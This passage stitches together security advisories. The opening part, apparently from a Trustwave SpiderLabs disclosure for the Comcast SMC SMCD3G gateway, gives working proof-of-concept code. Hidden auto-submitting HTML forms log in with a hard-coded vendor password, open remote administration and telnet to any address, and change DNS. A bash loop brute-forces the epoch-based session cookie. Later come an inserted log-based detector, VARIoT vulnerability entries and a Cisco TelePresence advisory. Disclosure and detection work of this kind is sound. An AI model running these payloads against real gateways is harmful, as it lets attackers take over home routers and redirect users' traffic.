The following Proof of Concept (PoC) connects to the gateway, logs in,
modifies the remote administration to allow any user to connect externally,
and modifies the DNS information.
## smcd3g-csrf-poc.htm
<html>
<body>
<iframe src="./smcd3g-csrf-poc-1.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-2.htm" width="1" height="1">
</iframe>
<iframe src="./smcd3g-csrf-poc-3.htm" width="1" height="1">
</iframe> </body> </html>
## smcd3g-csrf-poc-1.htm
<html>
<body>
<form action="http://10.1.10.1/goform/login" method="post"
name="tF">
<input type="hidden" name="user" value="mso" />
<input type="hidden" name="pws" value="D0nt4g3tme" />
</form> <script> document.tF.submit(); </script> </body>
</html>
## smcd3g-csrf-poc-2.htm
<html>
<body>
<form action="http://10.1.10.1/goform/RemoteRange"
name="RMangement" method="post"> <input type="hidden"
value="feat-admin-remote" name="file"> <input type="hidden"
value="admin/" name="dir"> <input type="hidden"
name="RemoteRange" value="0" /> <input type="hidden"
name="rm_access" value="on" /> <input type="hidden"
name="Remote0" value="0.0.0.0,0.0.0.0,1" /> <input
type="hidden" name="http_port" value="8080" /> <input
type="hidden" name="http_enable" value="on" /> <input
type="hidden" name="http_flag" value="1" /> <input
type="hidden" name="msoremote_enableCheck" value="on" />
<input type="hidden" name="mso_remote_enable" value="1" />
<input type="hidden" name="remote_enable" value="0" />
<input type="hidden" name="https_enable" value="on" />
<input type="hidden" name="https_port" value="8181" />
<input type="hidden" name="https_flag" value="1" /> <input
type="hidden" name="telnet_enable" value="on" /> <input
type="hidden" name="telnet_port" value="2323" /> <input
type="hidden" name="telnet_flag" value="1" /> <input
type="hidden" name="Remote1=" value="" /> </form> </body>
</html> <script>
setTimeout("document.RMangement.submit()",4000);
</script>
</body>
</html>
## smcd3g-csrf-poc-3.htm
<html>
<body>
<form name="WanIPform" action="http://10.1.10.1/goform/Basic" method="post">
<input type="hidden" value="feat-wan-ip" name="file">
<input type="hidden" value="admin/" name="dir">
<input type="hidden" value="Fixed" name="DNSAssign">
<input type="hidden" value="0" name="dhcpc_release">
<input type="hidden" value="0" name="dhcpc_renew">
<input type="hidden" value="" name="domain_name">
<input type="hidden" value="" name="WDn">
<input type="hidden" name="SysName" value="" />
<input type="hidden" name="manual_dns_enable" value="on" />
<input type="hidden" name="DAddr" value="4.2.2.1" />
<input type="hidden" name="DAddr0" value="4" />
<input type="hidden" name="DAddr1" value="2" />
<input type="hidden" name="DAddr2" value="2" />
<input type="hidden" name="DAddr3" value="1" />
<input type="hidden" name="PDAddr" value="4.2.2.2" />
<input type="hidden" name="PDAddr0" value="4" />
<input type="hidden" name="PDAddr1" value="2" />
<input type="hidden" name="PDAddr2" value="2" />
<input type="hidden" name="PDAddr3" value="2" />
</form>
<script>
setTimeout("document.WanIPform.submit()",5000);
</script>
</body>
</html>
If the PoC were embedded in any web page the targeted user visited while
logged into the device, the attacker would gain remote administration of
the gateway device, including a telnet shell. This would allow the attacker
to redirect traffic to a malicious end-point.
Finding 3: Weak Session Management
CVE: CVE-2011-0887
SMCD3G-CCR gateways provided by Comcast use a predictable value to
validate the active web management portal session. The epoch time at which
the session began is stored in a cookie labeled "userid". This yields a
predictable range of session IDs that can be brute-forced.
The following PoC attempts to brute-force the session IDs by requesting the
admin page with an incrementing cookie value and checking whether the
response redirects to login.asp.
## smcd3g-session-poc.sh
#!/bin/bash
# Candidate range of epoch-second session IDs to test
start=1267604160
end=1267605960
for (( i=$start; i<=$end; i++ ))
do
  # A valid session does not get redirected to login.asp
  if [ `curl -sb userid=$i http://10.1.10.1/admin/index.asp | grep -c login.asp` -lt "1" ]
  then
    echo "Session ID Found: $i"
  fi
  # Progress marker every 100 attempts
  if [ $(($i % 100)) -eq "0" ]
  then
    echo "Currently at $i"
  fi
done
Through this, an attacker can brute-force the possible valid session IDs.
Sessions expire by default within 10 minutes, so the attack window is
limited, but the technique can be combined with other attack methods.
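A defender-side counterpart to the PoC above, added here as an example and not part of the Trustwave advisory: it runs over constructed access-log lines (the log format, client addresses and threshold values are assumptions) and flags a client that presents a run of consecutive numeric userid cookie values against the admin page, which is the trace the enumeration leaves; a helper also checks whether a presented id even falls inside the 10-minute epoch window a live session could occupy.

```python
"""Detect enumeration of the epoch-based 'userid' session cookie.

Because the gateway sets userid to the epoch second at which a session began,
a guessing client walks through consecutive integers near the current time.
The detector parses constructed log lines in a hypothetical format (not the
device's own log format) and reports clients showing such a run.
"""
import re
from collections import defaultdict
from datetime import datetime

# Hypothetical log format: "<ISO time> <client ip> <path> userid=<n> <status>"
LOG_RE = re.compile(
    r"^(?P<ts>\S+) (?P<ip>\d+\.\d+\.\d+\.\d+) (?P<path>\S+) "
    r"userid=(?P<sid>\d+) (?P<status>\d{3})$"
)

# Sessions expire after 10 minutes, so a live id is at most 600 s old.
SESSION_LIFETIME_S = 600

# Constructed sample: one client sweeping ids, one legitimate admin, one
# non-admin request carrying an id older than the session lifetime.
SAMPLE_LOG = """\
2010-03-03T08:20:00+00:00 10.1.10.50 /admin/index.asp userid=1267604160 302
2010-03-03T08:20:01+00:00 10.1.10.50 /admin/index.asp userid=1267604161 302
2010-03-03T08:20:01+00:00 10.1.10.50 /admin/index.asp userid=1267604162 302
2010-03-03T08:20:02+00:00 10.1.10.50 /admin/index.asp userid=1267604163 302
2010-03-03T08:20:02+00:00 10.1.10.50 /admin/index.asp userid=1267604164 302
2010-03-03T08:20:03+00:00 10.1.10.50 /admin/index.asp userid=1267604165 200
2010-03-03T08:20:05+00:00 10.1.10.20 /admin/index.asp userid=1267604165 200
2010-03-03T08:21:10+00:00 10.1.10.20 /admin/status.asp userid=1267604165 200
2010-03-03T08:22:00+00:00 10.1.10.30 /index.asp userid=1267603900 200
""".splitlines()


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S%z").timestamp()
    return {"ts": ts, "ip": m["ip"], "path": m["path"],
            "sid": int(m["sid"]), "status": int(m["status"])}


def looks_like_epoch_session(sid, request_ts):
    """True if sid could be the epoch start of a session still alive at request_ts."""
    age = request_ts - sid
    return 0 <= age <= SESSION_LIFETIME_S


def longest_consecutive_run(ids):
    """Length of the longest run of consecutive integers among the given ids."""
    ids = sorted(set(ids))
    best = run = 1 if ids else 0
    for a, b in zip(ids, ids[1:]):
        run = run + 1 if b == a + 1 else 1
        best = max(best, run)
    return best


def detect_enumeration(lines, min_run=5, window_s=60):
    """Return {ip: longest run} for clients whose admin-page requests carry a
    run of at least min_run consecutive userid values inside window_s seconds."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["path"].startswith("/admin/"):
            per_ip[rec["ip"]].append(rec)
    hits = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        best, lo = 0, 0
        for hi in range(len(recs)):
            # Slide the window so recs[lo:hi+1] spans at most window_s seconds
            while recs[hi]["ts"] - recs[lo]["ts"] > window_s:
                lo += 1
            best = max(best, longest_consecutive_run(r["sid"] for r in recs[lo:hi + 1]))
        if best >= min_run:
            hits[ip] = best
    return hits


if __name__ == "__main__":
    for ip, run in detect_enumeration(SAMPLE_LOG).items():
        print(f"possible session-id enumeration from {ip}: run of {run} consecutive ids")
```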
Vendor Response:
These issues have been addressed as of version 1.4.0.49.2
Remediation Steps:
In order to determine if the correct version is installed, users should
view the "About" link in the management interface. Versions 1.4.0.49.2 and
above have been corrected.
Vendor Communication Timeline:
08/30/10 - Vulnerability disclosed
01/21/11 - Patch Released
02/04/11 - Advisory Published
Revision History:
1.0 Initial publication
References
1. http://www.smc.com/index.cfm?event=viewProduct&pid=1678
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave's SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
| VAR-201102-0386 | No CVE | Moxa Device Manager 'MDMUtil.dll' Remote Buffer Overflow Vulnerability |
CVSS V2: - CVSS V3: - Severity: LOW |
Moxa Device Manager is a remote management tool for Moxa's embedded computers. The "MDMUtil.dll" module contains a boundary error when processing certain messages; by enticing a user to connect to a malicious MDM gateway, an attacker can trigger a stack-based buffer overflow. Successful exploitation can execute arbitrary instructions in the security context of the application. Failed exploit attempts will result in a denial-of-service condition.
| VAR-201102-0225 | CVE-2011-0385 | Cisco TelePresence Recording Server and Cisco TelePresence Multipoint Switch Vulnerability in |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
The administrative web interface on Cisco TelePresence Recording Server devices with software 1.6.x and Cisco TelePresence Multipoint Switch (CTMS) devices with software 1.0.x, 1.1.x, 1.5.x, and 1.6.x allows remote attackers to create or overwrite arbitrary files, and possibly execute arbitrary code, via a crafted request, aka Bug IDs CSCth85786 and CSCth61065. A third party could create or overwrite arbitrary files and execute arbitrary code through crafted requests. Cisco TelePresence is a telepresence conferencing solution developed by Cisco. Unauthenticated remote attackers can send crafted requests to affected devices, allowing files with arbitrary content to be created anywhere on the device. To exploit this vulnerability, an attacker could send a specially crafted request to the device's TCP ports 80 and 443. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary files to the webserver.
This issue is tracked by Cisco bug IDs CSCth85786 and CSCth61065. The solution provides components such as audio and video spaces, which give remote participants a "face-to-face" virtual meeting room effect. The Cisco TelePresence implementation does not properly filter user-supplied input.
Cisco Security Advisory: Multiple Vulnerabilities in Cisco
TelePresence Recording Server
Advisory ID: cisco-sa-20110223-telepresence-ctrs
Revision 1.0
For Public Release 2011 February 23 1600 UTC (GMT)
+---------------------------------------------------------------------
Summary
=======
Multiple vulnerabilities exist within the Cisco TelePresence
Recording Server. The defect that is related to each component is
covered in each associated advisory.
All releases of Cisco TelePresence software prior to 1.7.1 are
affected by one or more of the vulnerabilities listed in this
advisory.
To determine the current version of software that is running on the
Cisco TelePresence Recording Server, SSH into the device and issue the
show version active and the show version inactive commands. The
output should resemble the following example:
admin: show version active
Active Master Version: 1.7.0.0-151
Active Version Installed Software Options:
No Installed Software Options Found.
admin: show version inactive
Inactive Master Version: 1.6.2.0-237
Inactive Version Installed Software Options:
No Installed Software Options Found.
In the preceding example, the system has versions 1.6.2 and 1.7.0
loaded on the device and version 1.7.0 is currently active. A device
is affected only by vulnerabilities that are present in the active
software version.
Products Confirmed Not Vulnerable
+--------------------------------
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
The Cisco TelePresence solution allows for immersive, in-person
communication and collaboration over the network with colleagues,
prospects, and partners even when they are located in opposite
hemispheres. These vulnerabilities are
independent of each other.
Unauthenticated Java Servlet Access
+----------------------------------
A number of sensitive Java Servlets delivered via a Java Servlet
framework within the Cisco TelePresence Recording Server could allow
a remote, unauthenticated attacker to perform actions that should be
restricted to administrative users.
* Cisco TelePresence Recording Server - CSCtf42005 (registered
customers only) has been assigned the CVE identifier CVE-2011-0383.
* Cisco TelePresence Recording Server - CSCtf97221 (registered
customers only) has been assigned the CVE identifier CVE-2011-0382.
* Cisco TelePresence Recording Server - CSCth85786 (registered
customers only) has been assigned the CVE identifier CVE-2011-0385.
This vulnerability could be leveraged to obtain full control of the
affected device.
* Cisco TelePresence Recording Server - CSCti50739 (registered
customers only) has been assigned the CVE identifier CVE-2011-0386.
Cisco Discovery Protocol Remote Code Execution
+---------------------------------------------
This vulnerability could allow an unauthenticated, adjacent attacker
to trigger a buffer overflow condition.
Because Cisco Discovery Protocol works at the data-link layer (Layer
2), an attacker must have a way to submit an Ethernet frame directly
to an affected device. This may be possible in situations where the
affected system is part of a bridged network or connected to a
nonpartitioned device such as a network hub.
* Cisco TelePresence Recording Server - CSCtd75769 (registered
customers only) has been assigned the CVE identifier CVE-2011-0379.
Ad Hoc Recording Denial of Service
+---------------------------------
A denial of service vulnerability exists within Cisco TelePresence
Recording Server devices. A restart of the affected
device may be required to regain functionality.
* Cisco TelePresence Recording Server - CSCtf97205 (registered
customers only) has been assigned the CVE identifier CVE-2011-0391.
Java RMI Denial of Service
+-------------------------
A denial of service vulnerability exists within Cisco TelePresence
Recording Server devices due to a failure to properly restrict access
to the RMI interface of the Java Servlet framework. An
unauthenticated, remote attacker could trigger an out-of-memory
condition on the Servlet host by issuing a series of crafted
requests.
* Cisco TelePresence Recording Server - CSCtg35830 (registered
customers only) has been assigned the CVE identifier CVE-2011-0388.
Unauthenticated XML-RPC Interface
+--------------------------------
This vulnerability could allow an unauthenticated, remote attacker to
perform a limited number of actions on the system that should be
restricted to authorized users.
* Cisco TelePresence Recording Server - CSCtg35833 (registered
customers only) has been assigned the CVE identifier CVE-2011-0392.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Cisco Security Advisory is done in accordance with
CVSS version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss.
* CSCtf42005 - Unauthenticated Java Servlet Access
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtf97221 - CGI Command Injection
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCth85786 - Unauthenticated Arbitrary File Upload
CVSS Base Score - 10
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.3
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCti50739 - XML-RPC Arbitrary File Overwrite
CVSS Base Score - 9.3
Access Vector - Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.7
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtd75769 - Cisco Discovery Protocol Remote Code Execution
CVSS Base Score - 7.9
Access Vector - Adjacent Network
Access Complexity - Medium
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 6.5
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtf97205 - Ad Hoc Recording Denial of Service
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtg35830 - Java RMI Denial of Service
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* CSCtg35833 - Unauthenticated XML-RPC Interface
CVSS Base Score - 7.5
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - Partial
Availability Impact - Partial
CVSS Temporal Score - 6.2
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the Unauthenticated Java Servlet Access
(CSCtf42005) vulnerability could allow an unauthenticated, remote
attacker to take complete control of the affected device or system.
Successful exploitation of the Cisco Discovery Protocol Remote Code
Execution (CSCtd75769) vulnerability could allow an unauthenticated,
adjacent attacker to take complete control of the affected system.
Successful exploitation of the Ad Hoc Recording Denial of Service
(CSCtf97205) vulnerability could allow an unauthenticated, remote
attacker to cause a persistent denial of service condition on an
affected device.
Successful exploitation of the Java RMI Denial of Service
(CSCtg35830) vulnerability could allow an unauthenticated, remote
attacker to cause all web-based services to become inaccessible.
Successful exploitation of the Unauthenticated XML-RPC Interface
(CSCtg35833) vulnerability could allow an unauthenticated, remote
attacker to perform a number of actions that should be restricted to
authenticated users.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the following Cisco TelePresence System Software table
defines a specific defect, the first fixed release, and the
recommended release to resolve all the security issues identified in
this advisory as well as other non-security-related issues. Cisco
recommends upgrading to a release equal to or later than the release
in the Recommended Release column of the table.
Workarounds
===========
There are no device- or system-based workarounds for the identified
vulnerabilities.
Additional mitigations that can be deployed on Cisco devices within
the network are available in the Cisco Applied Intelligence companion
document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20110223-telepresence.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at:
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at:
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone numbers,
and instructions and e-mail addresses for use in various languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
All vulnerabilities identified within this Security Advisory were
discovered internally by Cisco.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20110223-telepresence-ctrs.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
================
+----------+------------------+------------------------+
| Revision | Date             | Description            |
+----------+------------------+------------------------+
| 1.0      | 2011-February-23 | Initial public release |
+----------+------------------+------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2010-2011 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
| VAR-201102-0182 | CVE-2010-4741 | Moxa Device Manager MDMTool.exe Buffer Overflow Vulnerability |
Related entries in the VARIoT exploits database: VAR-E-201011-0390 |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Stack-based buffer overflow in MDMUtil.dll in MDMTool.exe in MDM Tool before 2.3 in Moxa Device Manager allows remote MDM Gateways to execute arbitrary code via crafted data in a session on TCP port 54321.
An attacker may exploit this issue to execute arbitrary code within the context of the application. Failed exploit attempts will likely cause denial-of-service conditions.
| VAR-201102-0174 | CVE-2010-4733 | WebSCADA Multiple Product Weak Password Vulnerabilities |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms have a default username and password, which makes it easier for remote attackers to obtain superadmin access via the web interface, a different vulnerability than CVE-2009-4463. Multiple vulnerabilities, including directory traversal, exist in products that run on the IntelliCom NetBiter NB100 and NB200 platforms. Other products that run on the NB100 and NB200 platforms may also be affected. A third party with access to the product could acquire superadmin authority (the top-level Netbiter permission) and browse system files and configuration files. In addition, arbitrary commands may be executed by uploading malicious code. A remote attacker can gain super administrator access through the web interface.
| VAR-201102-0197 | CVE-2010-4730 | WebSCADA Multiple products cgi-bin/read.cgi Directory Traversal Vulnerability |
CVSS V2: 6.8 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to read arbitrary files via a .. (dot dot) in the page parameter, a different vulnerability than CVE-2009-4463. cgi-bin/read.cgi in multiple IntelliCom products running on the IntelliCom NetBiter NB100 and NB200 platforms contains a directory traversal vulnerability.
| VAR-201102-0173 | CVE-2010-4732 | WebSCADA Multiple products cgi-bin/read.cgi Remote code execution vulnerability |
CVSS V2: 9.0 CVSS V3: - Severity: HIGH |
cgi-bin/read.cgi in WebSCADA WS100 and WS200, Easy Connect EC150, Modbus RTU - TCP Gateway MB100, and Serial Ethernet Server SS100 on the IntelliCom NetBiter NB100 and NB200 platforms allows remote authenticated administrators to execute arbitrary code by using a config.html 2.conf action to replace the logo page's GIF image file with a file containing this code, a different vulnerability than CVE-2009-4463. IntelliCom NetBiter products based on the NB100 and NB200 platforms contain multiple vulnerabilities. cgi-bin/read.cgi in multiple IntelliCom products running on the IntelliCom NetBiter NB100 and NB200 platforms contains a vulnerability that allows arbitrary code execution.